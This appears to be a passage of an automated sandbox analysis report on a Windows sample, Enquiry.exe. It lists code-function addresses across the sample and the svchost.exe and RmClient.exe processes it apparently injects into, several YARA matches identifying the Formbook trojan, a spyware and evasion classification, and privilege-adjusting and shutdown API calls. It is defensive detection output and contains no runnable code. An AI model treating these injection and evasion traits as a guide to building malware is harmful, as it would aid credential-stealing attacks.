            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0413EA400_2_0413EA40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183F31_2_004183F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030F01_2_004030F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012201_2_00401220
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EA231_2_0042EA23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC731_2_0040FC73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040256C1_2_0040256C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025101_2_00402510
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165CE1_2_004165CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165D31_2_004165D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE931_2_0040FE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF131_2_0040DF13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA3521_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F01_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031003E61_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E02741_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C02C01_2_030C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030301001_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA1181_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C81581_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F41A21_2_030F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031001AA1_2_031001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F81CC1_2_030F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D20001_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030647501_2_03064750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030407701_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C01_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C6E01_2_0305C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030405351_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031005911_2_03100591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E44201_2_030E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F24461_2_030F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EE4F61_2_030EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB401_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F6BD71_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA801_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030569621_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A01_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310A9A61_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304A8401_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030428401_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030268B81_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E8F01_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03082F281_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060F301_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E2F301_2_030E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4F401_2_030B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BEFA01_2_030BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032FC81_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEE261_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040E591_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052E901_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FCE931_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEEDB1_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304AD001_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DCD1F1_2_030DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03058DBF1_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303ADE01_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040C001_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0CB51_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030CF21_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F132D1_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D34C1_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308739A1_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A01_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C01_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D2F01_2_0305D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307516C1_2_0307516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F1721_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310B16B1_2_0310B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304B1B01_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF0CC1_2_030EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C01_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F70E91_2_030F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF0E01_2_030FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF7B01_2_030FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030856301_2_03085630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F16CC1_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F75711_2_030F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DD5B01_2_030DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031095C31_2_031095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF43F1_2_030FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030314601_2_03031460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFB761_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FB801_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B5BF01_2_030B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307DBF91_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFA491_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7A461_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B3A6C1_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DDAAC1_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03085AA01_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E1AA31_2_030E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EDAC61_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D59101_2_030D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030499501_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B9501_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD8001_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030438E01_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFF091_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041F921_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFFB11_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03003FD21_2_03003FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03003FD51_2_03003FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03049EB01_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03043D401_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F1D5A1_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7D731_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FDC01_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B9C321_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFCF21_2_030FFCF2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0390E3F06_2_0390E3F0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039C03E66_2_039C03E6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BA3526_2_039BA352
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039802C06_2_039802C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039A02746_2_039A0274
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039C01AA6_2_039C01AA
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039B41A26_2_039B41A2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039B81CC6_2_039B81CC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0399A1186_2_0399A118
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038F01006_2_038F0100
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039881586_2_03988158
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039920006_2_03992000
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038FC7C06_2_038FC7C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039247506_2_03924750
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039007706_2_03900770
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0391C6E06_2_0391C6E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039C05916_2_039C0591
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039005356_2_03900535
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039AE4F66_2_039AE4F6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039A44206_2_039A4420
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039B24466_2_039B2446
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039B6BD76_2_039B6BD7
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BAB406_2_039BAB40
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038FEA806_2_038FEA80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039029A06_2_039029A0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039CA9A66_2_039CA9A6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039169626_2_03916962
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038E68B86_2_038E68B8
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0392E8F06_2_0392E8F0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0390A8406_2_0390A840
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039028406_2_03902840
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0397EFA06_2_0397EFA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038F2FC86_2_038F2FC8
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03920F306_2_03920F30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039A2F306_2_039A2F30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03942F286_2_03942F28
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03974F406_2_03974F40
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03912E906_2_03912E90
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BCE936_2_039BCE93
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BEEDB6_2_039BEEDB
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BEE266_2_039BEE26
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03900E596_2_03900E59
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03918DBF6_2_03918DBF
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038FADE06_2_038FADE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0399CD1F6_2_0399CD1F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0390AD006_2_0390AD00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039A0CB56_2_039A0CB5
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038F0CF26_2_038F0CF2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03900C006_2_03900C00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0394739A6_2_0394739A
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039B132D6_2_039B132D
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038ED34C6_2_038ED34C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039052A06_2_039052A0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0391B2C06_2_0391B2C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0391D2F06_2_0391D2F0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039A12ED6_2_039A12ED
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0390B1B06_2_0390B1B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039CB16B6_2_039CB16B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038EF1726_2_038EF172
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0393516C6_2_0393516C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039070C06_2_039070C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039AF0CC6_2_039AF0CC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039B70E96_2_039B70E9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BF0E06_2_039BF0E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BF7B06_2_039BF7B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039B16CC6_2_039B16CC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039456306_2_03945630
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0399D5B06_2_0399D5B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039C95C36_2_039C95C3
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039B75716_2_039B7571
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BF43F6_2_039BF43F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038F14606_2_038F1460
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0391FB806_2_0391FB80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03975BF06_2_03975BF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0393DBF96_2_0393DBF9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BFB766_2_039BFB76
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03945AA06_2_03945AA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0399DAAC6_2_0399DAAC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039A1AA36_2_039A1AA3
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039ADAC66_2_039ADAC6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BFA496_2_039BFA49
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039B7A466_2_039B7A46
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03973A6C6_2_03973A6C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039959106_2_03995910
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039099506_2_03909950
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0391B9506_2_0391B950
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039038E06_2_039038E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0396D8006_2_0396D800
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03901F926_2_03901F92
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BFFB16_2_039BFFB1
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038C3FD56_2_038C3FD5
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038C3FD26_2_038C3FD2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BFF096_2_039BFF09
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03909EB06_2_03909EB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0391FDC06_2_0391FDC0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039B1D5A6_2_039B1D5A
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03903D406_2_03903D40
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039B7D736_2_039B7D73
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039BFCF26_2_039BFCF2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03979C326_2_03979C32
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F419906_2_02F41990
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F3CAE06_2_02F3CAE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F3AB606_2_02F3AB60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F3C8C06_2_02F3C8C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F432206_2_02F43220
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F4321B6_2_02F4321B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F450406_2_02F45040
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F5B6706_2_02F5B670
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375E3736_2_0375E373
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375E2576_2_0375E257
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375D7786_2_0375D778
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375E7186_2_0375E718
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375E70C6_2_0375E70C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_037654516_2_03765451
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375E4DB6_2_0375E4DB
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375CA336_2_0375CA33
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 107 times
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: String function: 00445AE0 appears 65 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 0397F290 appears 103 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 038EB970 appears 262 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 03947E54 appears 107 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 0396EA12 appears 86 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 03935130 appears 58 times
            Source: Enquiry.exe, 00000000.00000003.1726107731.00000000047AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Enquiry.exe
            Source: Enquiry.exe, 00000000.00000003.1724629385.0000000003EA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Enquiry.exe
            Source: Enquiry.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3532848428.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1991008499.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3534273215.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2000492218.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1997146655.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3533106895.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3536218795.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3534236092.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@12/9
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
